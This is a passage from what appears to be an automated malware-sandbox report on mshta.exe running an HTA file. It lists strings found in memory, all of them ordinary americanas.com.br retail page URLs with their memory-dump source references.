00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=pfm_home_amundo_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=prf_hs_0_dt_1_00_amundo
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-social?chave=dk_hm_branding_social
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744420175.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_ats_2_1_baixeoapp
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776109405.000000000C0C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668705608.000000000C0C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_dt_2_11_baixeoapp
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748344346.000000000C0D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_baixeoapp_faixa
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665561816.000000000AA04000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776074552.000000000C0BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667189470.000000000C11D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2752639169.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743361404.00000000092D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770941763.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=prf_hs_0_dt_1_00_baixeoapp
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/assessoria-imprensa?chave=dk_hm_ft_00_03_imprensa
Source: mshta.exe, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743405229.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713051987.0000000009A82000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705594806.0000000009A81000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777098061.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745817185.000000000C29F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento
Source: mshta.exe, 00000000.00000003.2743405229.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777098061.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745817185.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747706873.000000000C29F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento4
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744420175.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento?chave=dk_hm_ft_00_01_atendimento
Source: mshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento?chave=dk_hm_ft_00_01_atendimentohttps://www.americ
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento_entrega?chave=dk_hm_ft_00_04_entrega
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668493966.000000000C070000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764171931.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669539249.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670092360.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744420175.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento_trocasedevolucoes?chave=dk_hm_ft_00_02_trocas
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748463269.0000000009405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento_trocasedevolucoes?chave=dk_hm_ft_00_02_trocasFY
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.0000000009355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726617731.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-beleza?chave=dk_hm_bn_5_5_beleza
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-beleza?chave=dk_hm_bn_5_5_belezameta.largemeta.large.he
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714183267.0000000009A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-cameba?chave=dk_hm_bn_5_4_cameba
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-cameba?chave=dk_hm_bn_5_4_camebameta.largemeta.large.he
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-esporte?chave=dk_hm_bn_5_1_esporte
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-esporte?chave=dk_hm_bn_5_1_esportemeta.largemeta.large.
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-games?chave=dk_hm_bn_5_6_consolesN
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-games?chave=dk_hm_bn_5_6_consolesmeta.largemeta.large.h
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-pcs?chave=dk_hm_bn_5_2_pcs
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-pcs?chave=dk_hm_bn_5_2_pcsmeta.largemeta.large.heightme
